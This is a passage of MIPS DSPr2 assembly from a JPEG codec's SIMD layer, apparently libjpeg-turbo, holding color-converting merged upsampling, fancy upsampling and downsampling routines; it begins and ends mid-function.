addu t3, t9, t3 /* y+cred */
addu s3, t9, s3 /* y+cgreen */
addu v1, t9, v1 /* y+cblue */
lbu t3, 0(t3)
lbu s3, 0(s3)
lbu v1, 0(v1)
STORE_H2V2_1_PIXEL t3, s3, v1, t7
4:
RESTORE_REGS_FROM_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, ra
j ra
nop
END(jsimd_h2v2_\colorid\()_merged_upsample_dspr2)
.purgem STORE_H2V2_1_PIXEL
.purgem STORE_H2V2_2_PIXELS
.endm
/*------------------------------------id -- pix R1 G1 B1 A1 R2 G2 B2 A2 */
GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 extrgb, 6, 0, 1, 2, 6, 3, 4, 5, 6
GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 extbgr, 6, 2, 1, 0, 3, 5, 4, 3, 6
GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 extrgbx, 8, 0, 1, 2, 3, 4, 5, 6, 7
GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 extbgrx, 8, 2, 1, 0, 3, 6, 5, 4, 7
GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 extxbgr, 8, 3, 2, 1, 0, 7, 6, 5, 4
GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 extxrgb, 8, 1, 2, 3, 0, 5, 6, 7, 4
/*****************************************************************************/
/*
* jsimd_h2v1_merged_upsample_dspr2
* jsimd_h2v1_extrgb_merged_upsample_dspr2
* jsimd_h2v1_extrgbx_merged_upsample_dspr2
* jsimd_h2v1_extbgr_merged_upsample_dspr2
* jsimd_h2v1_extbgrx_merged_upsample_dspr2
* jsimd_h2v1_extxbgr_merged_upsample_dspr2
* jsimd_h2v1_extxrgb_merged_upsample_dspr2
*
* Merged h2v1 upsample routines
*/
.macro GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 colorid, pixel_size, \
r1_offs, g1_offs, \
b1_offs, a1_offs, \
r2_offs, g2_offs, \
b2_offs, a2_offs
.macro STORE_H2V1_2_PIXELS scratch0 scratch1 scratch2 scratch3 scratch4 \
scratch5 outptr
sb \scratch0, \r1_offs(\outptr)
sb \scratch1, \g1_offs(\outptr)
sb \scratch2, \b1_offs(\outptr)
sb \scratch3, \r2_offs(\outptr)
sb \scratch4, \g2_offs(\outptr)
sb \scratch5, \b2_offs(\outptr)
.if (\pixel_size == 8)
li t0, 0xFF
sb t0, \a1_offs(\outptr)
sb t0, \a2_offs(\outptr)
.endif
addiu \outptr, \pixel_size
.endm
.macro STORE_H2V1_1_PIXEL scratch0 scratch1 scratch2 outptr
sb \scratch0, \r1_offs(\outptr)
sb \scratch1, \g1_offs(\outptr)
sb \scratch2, \b1_offs(\outptr)
.if (\pixel_size == 8)
li t0, 0xFF
sb t0, \a1_offs(\outptr)
.endif
.endm
LEAF_DSPR2(jsimd_h2v1_\colorid\()_merged_upsample_dspr2)
/*
* a0 = cinfo->output_width
* a1 = input_buf
* a2 = in_row_group_ctr
* a3 = output_buf
* 16(sp) = range_limit
*/
SAVE_REGS_ON_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, ra
li t0, 0xe6ea
lw t1, 0(a1) /* t1 = input_buf[0] */
lw t2, 4(a1) /* t2 = input_buf[1] */
lw t3, 8(a1) /* t3 = input_buf[2] */
lw t8, 56(sp) /* t8 = range_limit */
addiu s1, t0, 0x7fff /* s1 = 0x166e9 [FIX(1.40200)] */
addiu s2, s1, 0x5eb9 /* s2 = 0x1c5a2 [FIX(1.77200)] */
addiu s0, t0, 0x9916 /* s0 = 0x8000 */
addiu s4, zero, 0xa7e6 /* s4 = 0xffffa7e6 [-FIX(0.34414)] */
xori s3, s4, 0xeec8 /* s3 = 0xffff492e [-FIX(0.71414)] */
srl t0, a0, 1
sll t4, a2, 2
lwx s5, t4(t1) /* s5 = inptr0 */
lwx s6, t4(t2) /* s6 = inptr1 */
lwx s7, t4(t3) /* s7 = inptr2 */
lw t7, 0(a3) /* t7 = outptr */
blez t0, 2f
addu t9, s6, t0 /* t9 = end address */
1:
lbu t2, 0(s6) /* t2 = cb */
lbu t0, 0(s7) /* t0 = cr */
lbu t1, 0(s5) /* t1 = y */
addiu t2, t2, -128 /* t2 = cb - 128 */
addiu t0, t0, -128 /* t0 = cr - 128 */
mult $ac1, s4, t2
madd $ac1, s3, t0
sll t0, t0, 15
sll t2, t2, 15
mulq_rs.w t0, s1, t0 /* t0 = (C1*cr + ONE_HALF)>> SCALEBITS */
extr_r.w t5, $ac1, 16
mulq_rs.w t6, s2, t2 /* t6 = (C2*cb + ONE_HALF)>> SCALEBITS */
addiu s7, s7, 1
addiu s6, s6, 1
addu t2, t1, t0 /* t2 = y + cred */
addu t3, t1, t5 /* t3 = y + cgreen */
addu t4, t1, t6 /* t4 = y + cblue */
addu t2, t8, t2
addu t3, t8, t3
addu t4, t8, t4
lbu t1, 1(s5)
lbu v0, 0(t2)
lbu v1, 0(t3)
lbu ra, 0(t4)
addu t2, t1, t0
addu t3, t1, t5
addu t4, t1, t6
addu t2, t8, t2
addu t3, t8, t3
addu t4, t8, t4
lbu t2, 0(t2)
lbu t3, 0(t3)
lbu t4, 0(t4)
STORE_H2V1_2_PIXELS v0, v1, ra, t2, t3, t4, t7
bne t9, s6, 1b
addiu s5, s5, 2
2:
andi t0, a0, 1
beqz t0, 4f
nop
3:
lbu t2, 0(s6)
lbu t0, 0(s7)
lbu t1, 0(s5)
addiu t2, t2, -128 /* (cb - 128) */
addiu t0, t0, -128 /* (cr - 128) */
mul t3, s4, t2
mul t4, s3, t0
sll t0, t0, 15
sll t2, t2, 15
mulq_rs.w t0, s1, t0 /* (C1*cr + ONE_HALF)>> SCALEBITS */
mulq_rs.w t6, s2, t2 /* (C2*cb + ONE_HALF)>> SCALEBITS */
addu t3, t3, s0
addu t3, t4, t3
sra t5, t3, 16 /* (C4*cb + ONE_HALF + C3*cr)>> SCALEBITS */
addu t2, t1, t0 /* y + cred */
addu t3, t1, t5 /* y + cgreen */
addu t4, t1, t6 /* y + cblue */
addu t2, t8, t2
addu t3, t8, t3
addu t4, t8, t4
lbu t2, 0(t2)
lbu t3, 0(t3)
lbu t4, 0(t4)
STORE_H2V1_1_PIXEL t2, t3, t4, t7
4:
RESTORE_REGS_FROM_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, ra
j ra
nop
END(jsimd_h2v1_\colorid\()_merged_upsample_dspr2)
.purgem STORE_H2V1_1_PIXEL
.purgem STORE_H2V1_2_PIXELS
.endm
/*------------------------------------id -- pix R1 G1 B1 A1 R2 G2 B2 A2 */
GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 extrgb, 6, 0, 1, 2, 6, 3, 4, 5, 6
GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 extbgr, 6, 2, 1, 0, 3, 5, 4, 3, 6
GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 extrgbx, 8, 0, 1, 2, 3, 4, 5, 6, 7
GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 extbgrx, 8, 2, 1, 0, 3, 6, 5, 4, 7
GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 extxbgr, 8, 3, 2, 1, 0, 7, 6, 5, 4
GENERATE_H2V1_MERGED_UPSAMPLE_DSPR2 extxrgb, 8, 1, 2, 3, 0, 5, 6, 7, 4
/*****************************************************************************/
/*
* jsimd_h2v2_fancy_upsample_dspr2
*
* Fancy processing for the common case of 2:1 horizontal and 2:1 vertical.
*/
LEAF_DSPR2(jsimd_h2v2_fancy_upsample_dspr2)
/*
* a0 = cinfo->max_v_samp_factor
* a1 = downsampled_width
* a2 = input_data
* a3 = output_data_ptr
*/
SAVE_REGS_ON_STACK 24, s0, s1, s2, s3, s4, s5
li s4, 0
lw s2, 0(a3) /* s2 = *output_data_ptr */
0:
li t9, 2
lw s1, -4(a2) /* s1 = inptr1 */
1:
lw s0, 0(a2) /* s0 = inptr0 */
lwx s3, s4(s2)
addiu s5, a1, -2 /* s5 = downsampled_width - 2 */
srl t4, s5, 1
sll t4, t4, 1
lbu t0, 0(s0)
lbu t1, 1(s0)
lbu t2, 0(s1)
lbu t3, 1(s1)
addiu s0, 2
addiu s1, 2
addu t8, s0, t4 /* t8 = end address */
andi s5, s5, 1 /* s5 = residual */
sll t4, t0, 1
sll t6, t1, 1
addu t0, t0, t4 /* t0 = (*inptr0++) * 3 */
addu t1, t1, t6 /* t1 = (*inptr0++) * 3 */
addu t7, t0, t2 /* t7 = thiscolsum */
addu t6, t1, t3 /* t5 = nextcolsum */
sll t0, t7, 2 /* t0 = thiscolsum * 4 */
subu t1, t0, t7 /* t1 = thiscolsum * 3 */
shra_r.w t0, t0, 4
addiu t1, 7
addu t1, t1, t6
srl t1, t1, 4
sb t0, 0(s3)
sb t1, 1(s3)
beq t8, s0, 22f /* skip to final iteration if width == 3 */
addiu s3, 2
2:
lh t0, 0(s0) /* t0 = A3|A2 */
lh t2, 0(s1) /* t2 = B3|B2 */
addiu s0, 2
addiu s1, 2
preceu.ph.qbr t0, t0 /* t0 = 0|A3|0|A2 */
preceu.ph.qbr t2, t2 /* t2 = 0|B3|0|B2 */
shll.ph t1, t0, 1
sll t3, t6, 1
addu.ph t0, t1, t0 /* t0 = A3*3|A2*3 */
addu t3, t3, t6 /* t3 = this * 3 */
addu.ph t0, t0, t2 /* t0 = next2|next1 */
addu t1, t3, t7
andi t7, t0, 0xFFFF /* t7 = next1 */
sll t2, t7, 1
addu t2, t7, t2 /* t2 = next1*3 */
addu t4, t2, t6
srl t6, t0, 16 /* t6 = next2 */
shra_r.w t1, t1, 4 /* t1 = (this*3 + last + 8) >> 4 */
addu t0, t3, t7
addiu t0, 7
srl t0, t0, 4 /* t0 = (this*3 + next1 + 7) >> 4 */
shra_r.w t4, t4, 4 /* t3 = (next1*3 + this + 8) >> 4 */
addu t2, t2, t6
addiu t2, 7
srl t2, t2, 4 /* t2 = (next1*3 + next2 + 7) >> 4 */
sb t1, 0(s3)
sb t0, 1(s3)
sb t4, 2(s3)
sb t2, 3(s3)
bne t8, s0, 2b
addiu s3, 4
22:
beqz s5, 4f
addu t8, s0, s5
3:
lbu t0, 0(s0)
lbu t2, 0(s1)
addiu s0, 1
addiu s1, 1
sll t3, t6, 1
sll t1, t0, 1
addu t1, t0, t1 /* t1 = inptr0 * 3 */
addu t3, t3, t6 /* t3 = thiscolsum * 3 */
addu t5, t1, t2
addu t1, t3, t7
shra_r.w t1, t1, 4
addu t0, t3, t5
addiu t0, 7
srl t0, t0, 4
sb t1, 0(s3)
sb t0, 1(s3)
addiu s3, 2
move t7, t6
bne t8, s0, 3b
move t6, t5
4:
sll t0, t6, 2 /* t0 = thiscolsum * 4 */
subu t1, t0, t6 /* t1 = thiscolsum * 3 */
addu t1, t1, t7
addiu s4, 4
shra_r.w t1, t1, 4
addiu t0, 7
srl t0, t0, 4
sb t1, 0(s3)
sb t0, 1(s3)
addiu t9, -1
addiu s3, 2
bnez t9, 1b
lw s1, 4(a2)
srl t0, s4, 2
subu t0, a0, t0
bgtz t0, 0b
addiu a2, 4
RESTORE_REGS_FROM_STACK 24, s0, s1, s2, s3, s4, s5
j ra
nop
END(jsimd_h2v2_fancy_upsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_h2v1_fancy_upsample_dspr2)
/*
* a0 = cinfo->max_v_samp_factor
* a1 = downsampled_width
* a2 = input_data
* a3 = output_data_ptr
*/
SAVE_REGS_ON_STACK 16, s0, s1, s2, s3
.set at
beqz a0, 3f
sll t0, a0, 2
lw s1, 0(a3)
li s3, 0x10001
addu s0, s1, t0
0:
addiu t8, a1, -2
srl t9, t8, 2
lw t7, 0(a2)
lw s2, 0(s1)
lbu t0, 0(t7)
lbu t1, 1(t7) /* t1 = inptr[1] */
sll t2, t0, 1
addu t2, t2, t0 /* t2 = invalue*3 */
addu t2, t2, t1
shra_r.w t2, t2, 2
sb t0, 0(s2)
sb t2, 1(s2)
beqz t9, 11f
addiu s2, 2
1:
ulw t0, 0(t7) /* t0 = |P3|P2|P1|P0| */
ulw t1, 1(t7)
ulh t2, 4(t7) /* t2 = |0|0|P5|P4| */
preceu.ph.qbl t3, t0 /* t3 = |0|P3|0|P2| */
preceu.ph.qbr t0, t0 /* t0 = |0|P1|0|P0| */
preceu.ph.qbr t2, t2 /* t2 = |0|P5|0|P4| */
preceu.ph.qbl t4, t1 /* t4 = |0|P4|0|P3| */
preceu.ph.qbr t1, t1 /* t1 = |0|P2|0|P1| */
shll.ph t5, t4, 1
shll.ph t6, t1, 1
addu.ph t5, t5, t4 /* t5 = |P4*3|P3*3| */
addu.ph t6, t6, t1 /* t6 = |P2*3|P1*3| */
addu.ph t4, t3, s3
addu.ph t0, t0, s3
addu.ph t4, t4, t5
addu.ph t0, t0, t6
shrl.ph t4, t4, 2 /* t4 = |0|P3|0|P2| */
shrl.ph t0, t0, 2 /* t0 = |0|P1|0|P0| */
addu.ph t2, t2, t5
addu.ph t3, t3, t6
shra_r.ph t2, t2, 2 /* t2 = |0|P5|0|P4| */
shra_r.ph t3, t3, 2 /* t3 = |0|P3|0|P2| */
shll.ph t2, t2, 8
shll.ph t3, t3, 8
or t2, t4, t2
or t3, t3, t0
addiu t9, -1
usw t3, 0(s2)
usw t2, 4(s2)
addiu s2, 8
bgtz t9, 1b
addiu t7, 4
11:
andi t8, 3
beqz t8, 22f
addiu t7, 1
2:
lbu t0, 0(t7)
addiu t7, 1
sll t1, t0, 1
addu t2, t0, t1 /* t2 = invalue */
lbu t3, -2(t7)
lbu t4, 0(t7)
addiu t3, 1
addiu t4, 2
addu t3, t3, t2
addu t4, t4, t2
srl t3, 2
srl t4, 2
sb t3, 0(s2)
sb t4, 1(s2)
addiu t8, -1
bgtz t8, 2b
addiu s2, 2
22:
lbu t0, 0(t7)
lbu t2, -1(t7)
sll t1, t0, 1
addu t1, t1, t0 /* t1 = invalue * 3 */
addu t1, t1, t2
addiu t1, 1
srl t1, t1, 2
sb t1, 0(s2)
sb t0, 1(s2)
addiu s1, 4
bne s1, s0, 0b
addiu a2, 4
3:
RESTORE_REGS_FROM_STACK 16, s0, s1, s2, s3
j ra
nop
END(jsimd_h2v1_fancy_upsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_h2v1_downsample_dspr2)
/*
* a0 = cinfo->image_width
* a1 = cinfo->max_v_samp_factor
* a2 = compptr->v_samp_factor
* a3 = compptr->width_in_blocks
* 16(sp) = input_data
* 20(sp) = output_data
*/
.set at
SAVE_REGS_ON_STACK 24, s0, s1, s2, s3, s4
beqz a2, 7f
lw s1, 44(sp) /* s1 = output_data */
lw s0, 40(sp) /* s0 = input_data */
srl s2, a0, 2
andi t9, a0, 2
srl t7, t9, 1
addu s2, t7, s2
sll t0, a3, 3 /* t0 = width_in_blocks*DCT */
srl t7, t0, 1
subu s2, t7, s2
0:
andi t6, a0, 1 /* t6 = temp_index */
addiu t6, -1
lw t4, 0(s1) /* t4 = outptr */
lw t5, 0(s0) /* t5 = inptr0 */
li s3, 0 /* s3 = bias */
srl t7, a0, 1 /* t7 = image_width1 */
srl s4, t7, 2
andi t8, t7, 3
1:
ulhu t0, 0(t5)
ulhu t1, 2(t5)
ulhu t2, 4(t5)
ulhu t3, 6(t5)
raddu.w.qb t0, t0
raddu.w.qb t1, t1
raddu.w.qb t2, t2
raddu.w.qb t3, t3
shra.ph t0, t0, 1
shra_r.ph t1, t1, 1
shra.ph t2, t2, 1
shra_r.ph t3, t3, 1
sb t0, 0(t4)
sb t1, 1(t4)
sb t2, 2(t4)
sb t3, 3(t4)
addiu s4, -1
addiu t4, 4
bgtz s4, 1b
addiu t5, 8
beqz t8, 3f
addu s4, t4, t8
2:
ulhu t0, 0(t5)
raddu.w.qb t0, t0
addqh.w t0, t0, s3
xori s3, s3, 1
sb t0, 0(t4)
addiu t4, 1
bne t4, s4, 2b
addiu t5, 2
3:
lbux t1, t6(t5)
sll t1, 1
addqh.w t2, t1, s3 /* t2 = pixval1 */
xori s3, s3, 1
addqh.w t3, t1, s3 /* t3 = pixval2 */
blez s2, 5f
append t3, t2, 8
addu t5, t4, s2 /* t5 = loop_end2 */
4:
ush t3, 0(t4)
addiu s2, -1
bgtz s2, 4b
addiu t4, 2
5:
beqz t9, 6f
nop
sb t2, 0(t4)
6:
addiu s1, 4
addiu a2, -1
bnez a2, 0b
addiu s0, 4
7:
RESTORE_REGS_FROM_STACK 24, s0, s1, s2, s3, s4
j ra
nop
END(jsimd_h2v1_downsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_h2v2_downsample_dspr2)
/*
* a0 = cinfo->image_width
* a1 = cinfo->max_v_samp_factor
* a2 = compptr->v_samp_factor
* a3 = compptr->width_in_blocks
* 16(sp) = input_data
* 20(sp) = output_data
*/
.set at
SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
beqz a2, 8f
lw s1, 52(sp) /* s1 = output_data */
lw s0, 48(sp) /* s0 = input_data */
andi t6, a0, 1 /* t6 = temp_index */
addiu t6, -1
srl t7, a0, 1 /* t7 = image_width1 */
srl s4, t7, 2
andi t8, t7, 3
andi t9, a0, 2
srl s2, a0, 2
srl t7, t9, 1
addu s2, t7, s2
sll t0, a3, 3 /* s2 = width_in_blocks*DCT */
srl t7, t0, 1
subu s2, t7, s2
0:
lw t4, 0(s1) /* t4 = outptr */
lw t5, 0(s0) /* t5 = inptr0 */
lw s7, 4(s0) /* s7 = inptr1 */
li s6, 1 /* s6 = bias */
2:
ulw t0, 0(t5) /* t0 = |P3|P2|P1|P0| */
ulw t1, 0(s7) /* t1 = |Q3|Q2|Q1|Q0| */
ulw t2, 4(t5)
ulw t3, 4(s7)
precrq.ph.w t7, t0, t1 /* t2 = |P3|P2|Q3|Q2| */
ins t0, t1, 16, 16 /* t0 = |Q1|Q0|P1|P0| */
raddu.w.qb t1, t7
raddu.w.qb t0, t0
shra_r.w t1, t1, 2
addiu t0, 1
srl t0, 2
precrq.ph.w t7, t2, t3
ins t2, t3, 16, 16
raddu.w.qb t7, t7
raddu.w.qb t2, t2
shra_r.w t7, t7, 2
addiu t2, 1
srl t2, 2
sb t0, 0(t4)
sb t1, 1(t4)
sb t2, 2(t4)
sb t7, 3(t4)
addiu t4, 4
addiu t5, 8
addiu s4, s4, -1
bgtz s4, 2b
addiu s7, 8
beqz t8, 4f
addu t8, t4, t8
3:
ulhu t0, 0(t5)
ulhu t1, 0(s7)
ins t0, t1, 16, 16
raddu.w.qb t0, t0
addu t0, t0, s6
srl t0, 2
xori s6, s6, 3
sb t0, 0(t4)
addiu t5, 2
addiu t4, 1
bne t8, t4, 3b
addiu s7, 2
4:
lbux t1, t6(t5)
sll t1, 1
lbux t0, t6(s7)
sll t0, 1
addu t1, t1, t0
addu t3, t1, s6
srl t0, t3, 2 /* t2 = pixval1 */
xori s6, s6, 3
addu t2, t1, s6
srl t1, t2, 2 /* t3 = pixval2 */
blez s2, 6f
append t1, t0, 8
5:
ush t1, 0(t4)
addiu s2, -1
bgtz s2, 5b
addiu t4, 2
6:
beqz t9, 7f
nop
sb t0, 0(t4)
7:
addiu s1, 4
addiu a2, -1
bnez a2, 0b
addiu s0, 8
8:
RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
j ra
nop
END(jsimd_h2v2_downsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_h2v2_smooth_downsample_dspr2)
/*
* a0 = input_data
* a1 = output_data
* a2 = compptr->v_samp_factor
* a3 = cinfo->max_v_samp_factor
* 16(sp) = cinfo->smoothing_factor
* 20(sp) = compptr->width_in_blocks
* 24(sp) = cinfo->image_width
*/
.set at
SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
lw s7, 52(sp) /* compptr->width_in_blocks */
lw s0, 56(sp) /* cinfo->image_width */
lw s6, 48(sp) /* cinfo->smoothing_factor */
sll s7, 3 /* output_cols = width_in_blocks * DCTSIZE */
sll v0, s7, 1
subu v0, v0, s0
blez v0, 2f
move v1, zero
addiu t0, a3, 2 /* t0 = cinfo->max_v_samp_factor + 2 */
0:
addiu t1, a0, -4
sll t2, v1, 2
lwx t1, t2(t1)
move t3, v0
addu t1, t1, s0
lbu t2, -1(t1)
1:
addiu t3, t3, -1
sb t2, 0(t1)
bgtz t3, 1b
addiu t1, t1, 1
addiu v1, v1, 1
bne v1, t0, 0b
nop
2:
li v0, 80
mul v0, s6, v0
li v1, 16384
move t4, zero
move t5, zero
subu t6, v1, v0 /* t6 = 16384 - tmp_smoot_f * 80 */
sll t7, s6, 4 /* t7 = tmp_smoot_f * 16 */
3:
/* Special case for first column: pretend column -1 is same as column 0 */
sll v0, t4, 2
lwx t8, v0(a1) /* outptr = output_data[outrow] */
sll v1, t5, 2
addiu t9, v1, 4
addiu s0, v1, -4
addiu s1, v1, 8
lwx s2, v1(a0) /* inptr0 = input_data[inrow] */
lwx t9, t9(a0) /* inptr1 = input_data[inrow+1] */
lwx s0, s0(a0) /* above_ptr = input_data[inrow-1] */
lwx s1, s1(a0) /* below_ptr = input_data[inrow+2] */
lh v0, 0(s2)
lh v1, 0(t9)
lh t0, 0(s0)
lh t1, 0(s1)
ins v0, v1, 16, 16
ins t0, t1, 16, 16
raddu.w.qb t2, v0
raddu.w.qb s3, t0
lbu v0, 0(s2)
lbu v1, 2(s2)
lbu t0, 0(t9)
lbu t1, 2(t9)
addu v0, v0, v1
mult $ac1, t2, t6
addu t0, t0, t1
lbu t2, 2(s0)
addu t0, t0, v0
lbu t3, 2(s1)
addu s3, t0, s3
lbu v0, 0(s0)
lbu t0, 0(s1)
sll s3, s3, 1
addu v0, v0, t2
addu t0, t0, t3
addu t0, t0, v0
addu s3, t0, s3
madd $ac1, s3, t7
extr_r.w v0, $ac1, 16
addiu t8, t8, 1
addiu s2, s2, 2
addiu t9, t9, 2
addiu s0, s0, 2
addiu s1, s1, 2
sb v0, -1(t8)
addiu s4, s7, -2
and s4, s4, 3
addu s5, s4, t8 /* end address */
4:
lh v0, 0(s2)
lh v1, 0(t9)
lh t0, 0(s0)
lh t1, 0(s1)
ins v0, v1, 16, 16
ins t0, t1, 16, 16
raddu.w.qb t2, v0
raddu.w.qb s3, t0
lbu v0, -1(s2)
lbu v1, 2(s2)
lbu t0, -1(t9)
lbu t1, 2(t9)
addu v0, v0, v1
mult $ac1, t2, t6
addu t0, t0, t1
lbu t2, 2(s0)
addu t0, t0, v0
lbu t3, 2(s1)
addu s3, t0, s3
lbu v0, -1(s0)
lbu t0, -1(s1)
sll s3, s3, 1
addu v0, v0, t2
addu t0, t0, t3
addu t0, t0, v0
addu s3, t0, s3
madd $ac1, s3, t7
extr_r.w t2, $ac1, 16
addiu t8, t8, 1
addiu s2, s2, 2
addiu t9, t9, 2
addiu s0, s0, 2
sb t2, -1(t8)
bne s5, t8, 4b
addiu s1, s1, 2
addiu s5, s7, -2
subu s5, s5, s4
addu s5, s5, t8 /* end address */
5:
lh v0, 0(s2)
lh v1, 0(t9)
lh t0, 0(s0)
lh t1, 0(s1)
ins v0, v1, 16, 16
ins t0, t1, 16, 16
raddu.w.qb t2, v0
raddu.w.qb s3, t0
lbu v0, -1(s2)
lbu v1, 2(s2)
lbu t0, -1(t9)
lbu t1, 2(t9)
addu v0, v0, v1
mult $ac1, t2, t6
addu t0, t0, t1
lbu t2, 2(s0)
addu t0, t0, v0
lbu t3, 2(s1)
addu s3, t0, s3
lbu v0, -1(s0)
lbu t0, -1(s1)
sll s3, s3, 1
addu v0, v0, t2
addu t0, t0, t3
lh v1, 2(t9)
addu t0, t0, v0
lh v0, 2(s2)
addu s3, t0, s3
lh t0, 2(s0)
lh t1, 2(s1)
madd $ac1, s3, t7
extr_r.w t2, $ac1, 16
ins t0, t1, 16, 16
ins v0, v1, 16, 16
raddu.w.qb s3, t0
lbu v1, 4(s2)
lbu t0, 1(t9)
lbu t1, 4(t9)
sb t2, 0(t8)
raddu.w.qb t3, v0
lbu v0, 1(s2)
addu t0, t0, t1
mult $ac1, t3, t6
addu v0, v0, v1
lbu t2, 4(s0)
addu t0, t0, v0
lbu v0, 1(s0)
addu s3, t0, s3
lbu t0, 1(s1)
lbu t3, 4(s1)
addu v0, v0, t2
sll s3, s3, 1
addu t0, t0, t3
lh v1, 4(t9)
addu t0, t0, v0
lh v0, 4(s2)
addu s3, t0, s3
lh t0, 4(s0)
lh t1, 4(s1)
madd $ac1, s3, t7
extr_r.w t2, $ac1, 16
ins t0, t1, 16, 16
ins v0, v1, 16, 16
raddu.w.qb s3, t0
lbu v1, 6(s2)
lbu t0, 3(t9)
lbu t1, 6(t9)
sb t2, 1(t8)
raddu.w.qb t3, v0
lbu v0, 3(s2)
addu t0, t0, t1
mult $ac1, t3, t6
addu v0, v0, v1
lbu t2, 6(s0)
addu t0, t0, v0
lbu v0, 3(s0)
addu s3, t0, s3
lbu t0, 3(s1)
lbu t3, 6(s1)
addu v0, v0, t2
sll s3, s3, 1
addu t0, t0, t3
lh v1, 6(t9)
addu t0, t0, v0
lh v0, 6(s2)
addu s3, t0, s3
lh t0, 6(s0)
lh t1, 6(s1)
madd $ac1, s3, t7
extr_r.w t3, $ac1, 16
ins t0, t1, 16, 16
ins v0, v1, 16, 16
raddu.w.qb s3, t0
lbu v1, 8(s2)
lbu t0, 5(t9)
lbu t1, 8(t9)
sb t3, 2(t8)
raddu.w.qb t2, v0
lbu v0, 5(s2)
addu t0, t0, t1
mult $ac1, t2, t6
addu v0, v0, v1
lbu t2, 8(s0)
addu t0, t0, v0
lbu v0, 5(s0)
addu s3, t0, s3
lbu t0, 5(s1)
lbu t3, 8(s1)
addu v0, v0, t2
sll s3, s3, 1
addu t0, t0, t3
addiu t8, t8, 4
addu t0, t0, v0
addiu s2, s2, 8
addu s3, t0, s3
addiu t9, t9, 8
madd $ac1, s3, t7
extr_r.w t1, $ac1, 16
addiu s0, s0, 8
addiu s1, s1, 8
bne s5, t8, 5b
sb t1, -1(t8)
/* Special case for last column */
lh v0, 0(s2)
lh v1, 0(t9)
lh t0, 0(s0)
lh t1, 0(s1)
ins v0, v1, 16, 16
ins t0, t1, 16, 16
raddu.w.qb t2, v0
raddu.w.qb s3, t0
lbu v0, -1(s2)
lbu v1, 1(s2)
lbu t0, -1(t9)
lbu t1, 1(t9)
addu v0, v0, v1
mult $ac1, t2, t6
addu t0, t0, t1
lbu t2, 1(s0)
addu t0, t0, v0
lbu t3, 1(s1)
addu s3, t0, s3
lbu v0, -1(s0)
lbu t0, -1(s1)
sll s3, s3, 1
addu v0, v0, t2
addu t0, t0, t3
addu t0, t0, v0
addu s3, t0, s3
madd $ac1, s3, t7
extr_r.w t0, $ac1, 16
addiu t5, t5, 2
sb t0, 0(t8)
addiu t4, t4, 1
bne t4, a2, 3b
addiu t5, t5, 2
RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
j ra
nop
END(jsimd_h2v2_smooth_downsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_int_upsample_dspr2)
/*
* a0 = upsample->h_expand[compptr->component_index]
* a1 = upsample->v_expand[compptr->component_index]
* a2 = input_data
* a3 = output_data_ptr
* 16(sp) = cinfo->output_width
* 20(sp) = cinfo->max_v_samp_factor
*/
.set at
SAVE_REGS_ON_STACK 16, s0, s1, s2, s3
lw s0, 0(a3) /* s0 = output_data */
lw s1, 32(sp) /* s1 = cinfo->output_width */
lw s2, 36(sp) /* s2 = cinfo->max_v_samp_factor */
li t6, 0 /* t6 = inrow */
beqz s2, 10f
li s3, 0 /* s3 = outrow */
0:
addu t0, a2, t6
addu t7, s0, s3
lw t3, 0(t0) /* t3 = inptr */
lw t8, 0(t7) /* t8 = outptr */
beqz s1, 4f
addu t5, t8, s1 /* t5 = outend */
1:
lb t2, 0(t3) /* t2 = invalue = *inptr++ */
addiu t3, 1
beqz a0, 3f
move t0, a0 /* t0 = h_expand */
2:
sb t2, 0(t8)
addiu t0, -1
bgtz t0, 2b
addiu t8, 1
3:
bgt t5, t8, 1b
nop
4:
addiu t9, a1, -1 /* t9 = v_expand - 1 */
blez t9, 9f
nop
5:
lw t3, 0(s0)
lw t4, 4(s0)
subu t0, s1, 0xF
blez t0, 7f
addu t5, t3, s1 /* t5 = end address */
andi t7, s1, 0xF /* t7 = residual */
subu t8, t5, t7
6:
ulw t0, 0(t3)
ulw t1, 4(t3)
ulw t2, 8(t3)
usw t0, 0(t4)
ulw t0, 12(t3)
usw t1, 4(t4)
usw t2, 8(t4)
usw t0, 12(t4)
addiu t3, 16
bne t3, t8, 6b
addiu t4, 16
beqz t7, 8f
nop
7:
lbu t0, 0(t3)
sb t0, 0(t4)
addiu t3, 1
bne t3, t5, 7b
addiu t4, 1
8:
addiu t9, -1
bgtz t9, 5b
addiu s0, 8
9:
addu s3, s3, a1
bne s3, s2, 0b
addiu t6, 1
10:
RESTORE_REGS_FROM_STACK 16, s0, s1, s2, s3
j ra
nop
END(jsimd_int_upsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_h2v1_upsample_dspr2)
/*
* a0 = cinfo->max_v_samp_factor
* a1 = cinfo->output_width
* a2 = input_data
* a3 = output_data_ptr
*/
lw t7, 0(a3) /* t7 = output_data */
andi t8, a1, 0xf /* t8 = residual */
sll t0, a0, 2
blez a0, 4f
addu t9, t7, t0 /* t9 = output_data end address */
0:
lw t5, 0(t7) /* t5 = outptr */
lw t6, 0(a2) /* t6 = inptr */
addu t3, t5, a1 /* t3 = outptr + output_width (end address) */
subu t3, t8 /* t3 = end address - residual */
beq t5, t3, 2f
move t4, t8
1:
